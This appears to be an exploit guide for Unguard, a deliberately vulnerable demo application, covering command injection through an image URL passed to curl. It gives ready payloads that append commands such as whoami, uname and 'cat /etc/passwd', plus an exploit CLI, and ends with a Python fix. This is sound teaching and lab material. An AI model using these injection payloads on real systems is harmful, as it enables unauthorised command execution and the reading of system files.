Command injection (sometimes CMD injection) is an attack that involves executing arbitrary commands on some host OS. Typically, this happens because of insufficient user input validation.
When posting images in Unguard, the user-controlled image URL is passed to the `curl` CLI program, making it possible to encode additional commands that will then just be executed on the `proxy-service`.
For this exploit to work you need:
- unguard deployed and running
- (optional) unguard-exploit-toolkit set up
To exploit the command injection vulnerability in the `proxy-service`, you simply have to log into Unguard and post an image with a URL that adds a second command to the `curl` call.
Without the CLI, you can simply craft your own payload:
Posting the following will result in executing `whoami` after example.com has been fetched.
Notice that the trailing `#` will comment out all the other original curl arguments, which is essential.
```
example.com && whoami #
```
Sending that request will result in a command similar to the following being executed on the `proxy-service`:
```
/bin/sh -c curl --silent -S example.com && whoami # --max-time 10 --output somepath.jpg
```
A few more example payloads that can be copied and pasted into the image URL field:
```
# This will write linux kernel information into a file
example.com && uname -a > pwned #
# This will simply print /etc/passwd (invisible to the attacker)
; cat /etc/passwd #
```
Using the CLI, you can specify any command to be executed.
Make sure to use `ug-exploit login` first, as you need to be logged in to post content.
Afterwards, just use `ug-exploit cmd-inject-proxy "<your-command>"` to execute arbitrary commands.
Writing current user into a file:
```
$ ug-exploit cmd-inject-proxy "whoami > /tmp/pwned"
```
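
The same `curl` call with the flaw removed, as an added example that is not Unguard's own code: the "before" function reproduces the string handed to `/bin/sh -c` above, and the "after" functions validate the URL and pass it to `curl` as a single argv element with no shell involved. All function names and the output path are assumptions made for this sketch.

```python
import subprocess
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# The payloads shown on this page, used here only as inputs that must be rejected.
PAGE_PAYLOADS = [
    "example.com && whoami #",
    "example.com && uname -a > pwned #",
    "; cat /etc/passwd #",
]


def vulnerable_command_line(url: str) -> str:
    """BEFORE: the URL is pasted into a string that /bin/sh -c will parse."""
    return f"curl --silent -S {url} --max-time 10 --output somepath.jpg"


def validate_image_url(url: str) -> str:
    """Accept only absolute http(s) URLs without whitespace or control characters."""
    if any(ch.isspace() or ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        raise ValueError("whitespace or control character in URL")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("only absolute http(s) URLs are accepted")
    return url


def build_curl_argv(url: str, output_path: str) -> list:
    """AFTER: one argv element per argument, so no shell ever parses the URL."""
    return ["curl", "--silent", "-S", "--max-time", "10",
            "--output", output_path,
            "--",  # end of options: the next element is always taken as the URL
            validate_image_url(url)]


def fetch_image(url: str, output_path: str) -> None:
    """Run curl directly (shell=False); &&, ; and # carry no special meaning."""
    subprocess.run(build_curl_argv(url, output_path),
                   shell=False, check=True, timeout=15)


def is_rejected(url: str) -> bool:
    """True when validation refuses the URL before curl is ever started."""
    try:
        validate_image_url(url)
    except ValueError:
        return True
    return False
```

Validation and the argv form are independent layers: even if a URL slipped past `validate_image_url`, `shell=False` means its metacharacters would reach `curl` as literal text rather than being interpreted by `/bin/sh`.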